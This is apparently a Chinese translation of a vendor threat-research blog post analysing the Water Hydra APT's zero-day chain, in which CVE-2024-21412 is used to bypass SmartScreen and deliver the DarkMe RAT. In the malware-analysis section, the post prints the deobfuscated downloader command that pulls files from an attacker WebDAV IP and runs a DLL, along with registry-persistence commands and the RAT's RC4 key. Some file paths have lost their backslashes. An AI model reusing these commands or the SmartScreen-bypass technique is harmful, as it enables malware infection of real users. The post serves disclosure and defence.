CVE-2024-21412 APT(Water Hydra)-0 Day 攻击链分析

趋势科技零日计划发现了漏洞 CVE-2024-21412，我们将其跟踪为 ZDI-CAN-23100，并向 Microsoft 发出警报，称 Microsoft Defender SmartScreen 绕过被高级持续性威胁用作复杂的零日攻击链的一部分（我们追踪的 APT）组织为 Water Hydra（又名 DarkCasino），其目标是金融市场交易者。

2023 年 12 月下旬，我们开始跟踪 Water Hydra 组织发起的一项活动，其中包含类似的工具、策略和程序 (TTP)，其中涉及滥用互联网快捷方式 (.URL) 和基于 Web 的分布式创作和版本控制 (WebDAV) 组件。在此攻击链中，威胁行为者利用 CVE-2024-21412 绕过 Microsoft Defender SmartScreen 并用 DarkMe 恶意软件感染受害者。ZDI 漏洞赏金计划与 Microsoft 合作，致力于披露此零日攻击并确保快速修补此漏洞。Trend 还通过本博客文章末尾提供的安全解决方案，为用户提供保护，使其免受利用 CVE-2024-21412 的威胁行为者的侵害。

关于 Water Hydra APT 小组

Water Hydra 组织于 2021 年首次被发现，当时该组织因针对金融行业、对全球银行、加密货币平台、外汇和股票交易平台、赌B网站和赌C发起攻击而声名狼藉。

最初，由于类似的网络钓鱼技术和其他 TTP，该组织的攻击被归因于 Evilnum APT 组织。2022 年 9 月，绿盟科技的研究人员发现了名为 DarkMe 的 VisualBasic 远程访问工具 (RAT)，这是一项名为 DarkCasino 的活动的一部分，该活动针对的是欧洲交易者和赌B平台。

到 2023 年 11 月，经过多次连续的攻击活动，其中包括利用攻击链中著名的WinRAR 代码执行漏洞 CVE-2023-38831来针对股票交易者，人们发现 Water Hydra 是一个独立于 Evilnum 的 APT 组织。

Water Hydra 的攻击模式显示出极高的技术水平和复杂程度，包括在攻击链中使用未公开的零日漏洞的能力。例如，Water Hydra 组织在 2023 年 4 月（披露前几个月）利用上述 CVE-2023-38831 作为零日攻击目标加密货币交易者。自披露以来，CVE-2023-38831 也被其他 APT 组织利用，例如 APT28 (FROZENLAKE)、APT29 (Cozy Bear)、APT40、Dark Pink、Ghostwriter、Konni 和 Sandworm。

Water Hydra 攻击链和 TTP

2023年12月攻击链

图 1 显示了利用 CVE-2024-21412 的原始感染链。自 2024 年 1 月下旬以来，Water Hydra 一直在使用简化的感染流程。

图 1. Water Hydra 使用的攻击链

更新了 2024 年 1 月至 2 月攻击链

2024 年 1 月，Water Hydra 更新了其感染链，利用 CVE-2024-21412 执行恶意 Microsoft 安装程序文件 (.MSI)，从而简化了 DarkMe 感染过程。

图 2. 更新后的攻击链

感染链分析

在本节中，我们将分析完整的 Water Hydra 活动，该活动利用 CVE-2024-21412 绕过 Microsoft Defender SmartScreen，用 DarkMe 恶意软件感染用户。

初始访问：外汇论坛上的鱼叉式网络钓鱼尝试

在攻击链中，Water Hydra 在外汇交易论坛和股票交易 Telegram 频道上部署了鱼叉式网络钓鱼活动（T1566.002），利用各种社会工程技术（例如发布请求或提供交易的消息），引诱潜在交易者感染 DarkMe 恶意软件。建议，分享围绕图形技术分析、图形指标工具的虚假股票和金融工具，所有这些工具都附有一个指向受感染的俄罗斯交易和加密货币信息网站 (fxbulls[.]ru) 提供的特洛伊木马股票图表的 URL 。

图 3. 威胁行为者在热门外汇交易论坛上发布的鱼叉式网络钓鱼帖子

有趣的是，这个受感染的 WordPress 网站与实际的外汇经纪商 fxbulls[.]com 同名，但托管在俄罗斯 (.ru) 域上。

图 4. fxbulls.ru（左）和 fxbulls.com（右）的比较

fxbulls[.]com 经纪商使用 MetaTrader 4 (MT4) 交易平台，由于西方对俄罗斯的制裁，该平台于 2022 年 9 月从苹果应用商店下架。然而，Apple 在 2023 年 3 月之前恢复了 MT4 和另一个 MetaTrader 版本 (MT5)。

在分析外汇交易论坛上的鱼叉式网络钓鱼活动时，我们发现了 Water Hydra 发布的大量英语和俄语帖子。通常，这些帖子会回复有关交易图表技术分析的一般外汇或股票交易问题，并包含股票图表的链接作为诱惑。

然而，这些帖子并没有链接到预期的股票图表，而是链接回 HTM/HTML 登陆页面，该登陆页面托管在 WordPress 上托管的受感染的俄语外汇、股票和加密货币新闻网站上，登陆页面显示第二个恶意链接。该诱饵伪装成 JPEG 文件的链接，指向 WebDAV 共享。我们发现的许多发布恶意 fxbulls[.]ru 网站链接的帐户已有多年历史，这表明作为其活动的一部分，DarkMe 可能已经危害了交易论坛上的合法用户帐户。

图 5. fxbulls[.]ru 上的恶意登陆页面

fxbulls[.]ru 上的登陆页面包含指向恶意 WebDAV 共享的链接，其中包含经过过滤的精心设计的视图。当用户单击此链接时，浏览器将要求他们在 Windows 资源管理器中打开该链接。这不是安全提示，因此用户可能不会认为该链接是恶意的。

图 6. 分析恶意链接和 WebDAV URL

图 6 显示了 JPEG 特洛伊木马使用 Windows高级查询语法 (AQS)链接回 WebDAV 共享。

初始访问：使用搜索：协议自定义 Windows 资源管理器窗口

在此活动中，Water Hydra 采用了一种有趣的技术来引诱受害者单击恶意 Internet 快捷方式 (.url) 文件。此 TTP 滥用了 Microsoft Windows搜索：应用程序协议，该协议与更常见的 ms-search 协议不同。search: 协议自 Vista 起就成为 Windows 的一部分，它调用 Windows 桌面搜索应用程序。在感染链中，Water Hydra 使用 search: 协议和精心设计的高级查询语法 (AQS)查询来自定义 Windows 资源管理器视图的外观，以欺骗受害者。

图 7. HTML 滥用搜索：协议

图 7 显示了包含恶意搜索的 HTML：URL。请注意 URL 的以下特征：

•        它使用搜索：应用程序协议搜索来执行对photo_2023-12-29.jpg 的搜索。

•        它使用crumb 参数将搜索范围限制为恶意 WebDAV 共享。

•        它使用DisplayName 元素来欺骗用户，使其认为这是本地下载文件夹。

图 8. 视图被过滤的恶意 WebDAV 共享

单击图 7 中所示的链接后，我们可以看到 Windows 资源管理器视图如何呈现给受害者（图 8）。通过结合使用搜索协议、AQS 查询和 DisplayName 元素，Water Hydra 操作员可以诱骗用户相信来自恶意 WebDAV 服务器的文件已被下载，从而诱骗他们单击此恶意文件（伪造的 JPEG 图像） 。此资源管理器窗口是一个精心设计的恶意.url 文件视图，名为photo_2023-12-29.jpg.url。Microsoft Windows 自动隐藏 .url 扩展名，使文件名看起来像是 JPEG 图像。

执行：利用 CVE-2024-21412 (ZDI-CAN-23100) 绕过 Microsoft Defender SmartScreen

CVE-2024-21412 围绕互联网快捷方式。这些 .url 文件是简单的 INI 配置文件，采用指向 URL 的“URL=”参数。虽然.url 文件格式没有正式记录，但 URL 参数是该文件类型唯一需要的参数。

在分析这个恶意.url文件的过程中，我们还注意到Water Hydra使用imagress.dll （Windows图像资源）图标库，使用IconFile =和IconIndex=参数将默认的互联网快捷方式文件更改为图像图标，以进一步欺骗用户并向特洛伊木马互联网快捷方式添加合法性。通过简单地双击这个伪装成 JPEG 的互联网快捷方式，Water Hydra 操作员就可以利用 CVE-2024-21412 绕过 Microsoft Defender SmartScreen，并完全危害 Windows 主机。

在分析受 CVE-2024-21412 感染的互联网快捷方式文件时，我们注意到一些异常情况。photo_2023-12-29.jpg.url文件的URL =参数指向托管在具有点分四元地址 (IPv4) 的服务器上的另一个 Internet 快捷方式文件。

图 9. photo_2023-12-29.jpg.url 互联网快捷方式指向另一个互联网快捷方式文件

在分析恶意 WebDAV 共享期间，我们能够获取所有 Water Hydra 工件，包括引用的2.url互联网快捷方式。根据此参考线索，我们发现2.url包含利用先前修补的 Microsoft Defender SmartScreen 绕过（标识为CVE-2023-36025 ）的逻辑。在我们最近的研究中，我们深入研究了针对此 CVE 的活动。

图 10. 2.url 互联网快捷方式指向 ZIP 存档中的 CMD shell 脚本

在另一个互联网快捷方式中引用一个互联网快捷方式是非常不寻常的。由于这种异常行为，我们创建了概念验证 (PoC) 来执行进一步的测试和分析。在此 PoC 测试期间，ZDI 发现初始快捷方式（引用第二个快捷方式）设法绕过解决 CVE-2023-36025 的补丁，从而逃避 SmartScreen 保护。通过对内部 PoC 的分析和测试，我们得出的结论是，在另一个快捷方式中调用快捷方式足以逃避 SmartScreen，而 SmartScreen 无法正确应用 Mark-of-the-Web (MotW)，这是一个在打开时提醒用户的关键 Windows 组件或运行来自不受信任来源的文件。经过分析后，我们联系了 Microsoft MSRC，提醒他们有一个活跃的 SmartScreen 零日漏洞正在野外被利用，并向他们提供了我们的概念验证漏洞利用。

图 11. 应用 MotW 后应显示的 Microsoft Defender SmartScreen 窗口

通过精心设计 Windows 资源管理器视图，Water Hydra 能够诱使受害者点击 CVE-2024-21412 的漏洞，进而执行来自不受信任来源的代码，依赖于 Windows 无法正确应用 MotW 并导致缺失SmartScreen 保护。感染链只是在后台运行，受感染的用户对此一无所知。

图 12. a2.cmd 文件复制并运行名为 b3.dll 的 DarkMe 加载程序

绕过 SmartScreen 后，第二个2.url快捷方式会运行嵌入在攻击者 WebDAV 共享的 ZIP 文件中的批处理文件。此批处理脚本从恶意 WebDAV 共享复制并执行 DarkMe 动态链接库 (DLL) 加载程序。令人震惊的是，整个序列在用户不知情和 SmartScreen 保护的情况下运行。最终用户几乎没有任何迹象表明有任何事情正在进行。

图 13. Process Explorer 显示正在复制和运行的批处理文件 a2.cmd

在图 13 中，Sysinternals Process Explorer显示恶意批处理文件的执行情况。此批处理文件是利用 CVE-2024-21412 导致绕过 SmartScreen 保护后运行的第一个脚本。

图 14. 为获取工具和持久性而利用攻击后与攻击者命令与控制 (C&C) 服务器建立的网络连接

图 14 中的屏幕截图显示了对 Water Hydra WebDAV 共享发出的大量请求。在 WebDAV 中，我们可以观察到多个属性查找(PROPFIND) 请求，以从 WebDAV 服务器检索 XML 存储的属性。

图 15. 完成利用和感染链后向受害者显示的库存图图像 (JPEG)

一旦利用和感染链完成，威胁参与者就会连接到其 C&C WebDAV 服务器以下载真实的 JPEG 文件，该文件与用于利用 CVE-2024-21412 的特洛伊木马 JPEG 文件同名。然后，该文件会显示给受害者，受害者会被欺骗，认为自己已经打开了原本打算从“下载”文件夹中查看的 JPEG 文件（对 DarkMe 感染一无所知）。

DarkMe 下载器是一个用 Visual Basic 编写的 DLL，负责从攻击者的 WebDAV 下载并执行下一阶段的有效负载。该恶意软件通过cmd.exe命令解释器运行一系列命令来执行其操作。在恶意软件中，这些命令使用反向字符串技术进行加扰。要执行命令，它首先通过使用Strings.StrReverse方法将字符串顺序反转回正常来重建它们，然后通过shell方法执行它们。值得注意的是，该恶意软件加载了垃圾代码，以掩盖其真实目的并使逆向工程复杂化。为了研究和更容易理解，本博客条目中的所有代码片段都以去混淆、更清晰的形式呈现。

以下代码片段说明了恶意软件如何执行上述操作：

图 16. DarkMe 下载器使用的混淆命令

反混淆后的命令行如下：

cmd /c copy /b \84[.]32[.]189[.]74@80fxbullspictures7z[.]dll %TEMP%7z[.]dll&&cmd /c copy /b \84[.]32[.]189[.]74@80fxbullspictures7z[.]exe %TEMP%7z[.]exe&&cmd /c \84[.]32[.]189[.]74@80fxbullspicturesphoto_2023-12-29s[.]jpg&&cmd /c copy /b \84[.]32[.]189[.]74@80fxbullspicturesMy2[.]zip %TEMP%My2[.]zip&&timeout 1&&cmd /c cd %TEMP%&&7z x "My2[.]zip" -password-1 -y&&timeout 1&&cmd /c rundll32 undersets[.]dll, RunDllEntryPointW&&timeout 1&&pause

下表显示了执行的命令及其作用的说明：

表 2. 脚本执行的命令

如脚本的最后步骤所示，恶意软件通过rundll32从名为undersets.dll的 DLL执行RunDllEntryPointW导出函数。

下图显示了My2.zip的内容：

图 17. My2.zip 的内容

执行后，恶意软件通过将两个二进制文件（a1和a2）的内容合并到一个新文件C:UsersadminAppDataRoamingOnlineProjectsOnlineProject.dll中来构建 DarkMe 有效负载。

为了避免直接在二进制文件中暴露重要字符串，恶意软件以十六进制格式对它们进行编码。随后，它会根据需要在执行过程中将这些内容解码为 ASCII 表示形式。

为了简化研究并增强可读性，所有垃圾代码已被删除，并将十六进制编码数据转换为 ASCII 格式。

该恶意软件构建并执行以下命令，利用reg.exe实用程序从kb.txt文件导入注册表设置：

"C:WindowsSystem32cmd.exe" /c cd C:UsersadminAppDataRoamingOnlineProjects&&cmd /c timeout 1&&cmd /c reg.exe import kb.txt

这些设置与将 DarkMe 负载OnlineProject.dll注册为 COM 服务器并在系统注册表中设置其配置相关。

图 18. 构建并执行命令以导入注册表文件

以下代码片段显示了kb.txt注册表文件内容：

图 19. 构建并执行命令以导入注册表文件

最后，为了运行负载，加载器执行以下命令来调用注册的 COM 类：

“C:WindowsSysWOW64rundll32.exe”/sta {74A94F46-4FC5-4426-857B-FCE9D9286279}

图 20. 通过 COM 类执行有效负载

这次攻击的最终交付者是一种名为 DarkMe 的 RAT。与加载器和下载器模块一样，该恶意软件是一个 DLL 文件，用 Visual Basic 编写。然而，与前两个模块相比，最后一个模块具有更多的混淆和垃圾代码。该恶意软件使用 TCP 上的自定义协议与其 C&C 服务器进行通信。

执行后，恶意软件会从受感染的系统收集信息，包括计算机名称、用户名、安装的防病毒软件和活动窗口的标题。然后它会向攻击者的 C&C 服务器注册自身。

为了建立网络通信并处理套接字消息，恶意软件使用CreateWindowEx Windows API 创建一个名为SOCKET_WINDOW且具有STATIC类型的隐藏窗口。该隐藏窗口通过窗口消息传输套接字数据，从而促进与服务器的通信。

图 21. 通过 CreateWindowEx 建立网络通信

C&C 域使用 RC4 加密并存储在名为Text2022的 VB.Form TextBox 中。恶意软件使用硬编码密钥“noway123!$$#@35@!”对其进行解密。

图22. 域RC4解密过程

然后，恶意软件通过收集计算机名称、用户名、安装的防病毒软件和活动窗口标题等信息，将受害者的系统注册到其 C&C 服务器。

以下是恶意软件发送给注册受害者的初始网络流量的示例：

图 23. DarkMe RAT 的初始流量

以下是DarkMe使用的初始数据包结构：

表 5. DarkMe 使用的初始数据包结构

图 24. DarkMe RAT C&C 注册数据包构造

为了检查与 C&C 服务器的连接，恶意软件会定期发送心跳包。该恶意软件为此任务设置了一个名为Timer3的单独计时器，其间隔为“5555 毫秒”。图 25 显示了此流量的示例（DarkMe 的某些变体发送不同的值）：

图 25. DarkMe 心跳流量

一旦恶意软件注册了受害者，它就会启动传入 TCP 连接的侦听器，等待接收来自攻击者的命令。一旦收到命令，恶意软件就会在受感染的系统上解析并执行该命令。该恶意软件支持多种功能。支持的命令将允许恶意软件枚举目录内容（STRFLS、STRFL2）、执行shell命令（SHLEXE）、创建和删除目录、检索系统驱动器信息（300100）以及从给定路径（ZIPALO）生成ZIP文件等。

结论

零日攻击对组织来说是一个重大的安全风险，因为这些攻击利用了软件供应商未知的漏洞，并且没有相应的安全补丁。Water Hydra 等 APT 组织拥有技术知识和工具，可以在高级活动中发现和利用零日漏洞，部署 DarkMe 等极具破坏性的恶意软件。

在之前的一次活动中，Water Hydra 在组织能够保护自己之前几个月就利用了 CVE-2023-38831。披露后，CVE-2023-38831 随后被其他 APT 组织部署在其他活动中。ZDI 注意到零日滥用的几个令人担忧的趋势。首先，网络犯罪组织发现的零日漏洞已进入民族国家 APT 组织部署的攻击链，例如 APT28（FROZENLAKE）、APT29（Cozy Bear）、APT40、Dark Pink、Ghostwriter、Konni、Sandworm 等。和更多。这些组织利用这些漏洞发起复杂的攻击，从而加剧了组织的风险。其次，CVE-2024-21412 对 CVE-2023-36025 的简单绕过凸显了安全补丁方面更广泛的行业趋势，表明 APT 威胁行为者如何通过识别已修补软件组件周围的新攻击向量来轻松规避窄补丁。

为了使软件更加安全并保护客户免受零日攻击，趋势零日计划与安全研究人员和供应商合作，在 APT 组织部署软件漏洞进行攻击之前修补并负责任地披露软件漏洞。ZDI 威胁追踪团队还主动搜寻野外零日攻击，以保护行业安全。

组织可以使用Trend Vision One™️保护自己免受此类攻击，这使安全团队能够持续识别攻击面，包括已知、未知、托管和非托管网络资产。愿景一帮助组织优先考虑并解决潜在风险，包括漏洞。它考虑潜在攻击的可能性和影响等关键因素，并提供一系列预防、检测和响应功能。这一切都得到了先进的威胁研究、情报和人工智能的支持，这有助于减少检测、响应和修复问题所需的时间。最终，Vision One 可以帮助改善组织的整体安全状况和有效性，包括抵御零日攻击。

当面临不确定的入侵、行为和例程时，组织应假设其系统已经受到损害或破坏，并立即隔离受影响的数据或工具链。凭借更广阔的视野和快速响应，组织可以解决漏洞并保护其剩余系统，特别是使用  趋势科技端点安全和趋势科技网络安全等技术，以及 趋势科技™ XDR等全面的安全解决方案，它可以检测、扫描并阻止现代威胁环境中的恶意内容。

结语

在对 CVE-2024-21412 和 Water Hydra 的调查过程中，我们开始跟踪该零日漏洞周围的其他威胁行为者活动。特别是，DarkGate 恶意软件运营商开始将此漏洞纳入他们的感染链中。我们将在未来的博客文章中提供有关利用 CVE-2024-21412 的威胁参与者的更多信息和分析。通过 ZDI-CAN-23100 的虚拟补丁，趋势科技客户可以免受这些额外活动的影响。